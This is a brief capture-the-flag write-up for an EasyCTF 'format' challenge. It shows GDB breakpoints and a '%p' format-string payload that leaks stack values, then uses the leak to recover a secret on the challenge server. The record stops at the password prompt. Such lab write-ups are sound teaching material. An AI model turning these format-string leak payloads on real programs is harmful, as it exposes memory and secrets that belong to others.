EASYCTF - Format

With GDB, we put a breakpoint when the program compare the secret with our input.

0x0000000000400917 <+144>: cmp eax,DWORD PTR [rbp-0x54]

We display the content of the stack with the format string:

Input in GDB :

r < /tmp/f `python2 -c "print 'AAAA%p%p%p%p%p%p%p'*30+'\\nAAAA'" > /tmp/f

Output :


We look at the content of secret which is at $rbp-0x54 :

x/ga $rbp-0x54 0x702570251013f249

The program compare with eax. So we need to look at the 32 lowest bits of RAX.
So the secret is : 1013f249
We look for the secret in the leak from the format string. The content of secret is on 7th pointer.

We do the same on the server

user44798@shell:/problems/format$ ./format 
Enter your name: %p%p%p%p%p%p%p
Your name is: 0x400a5a0x7ff00014c7800xe0x7ff0003697000xe(nil)0x732581c900000000

Enter your secret password (in hex)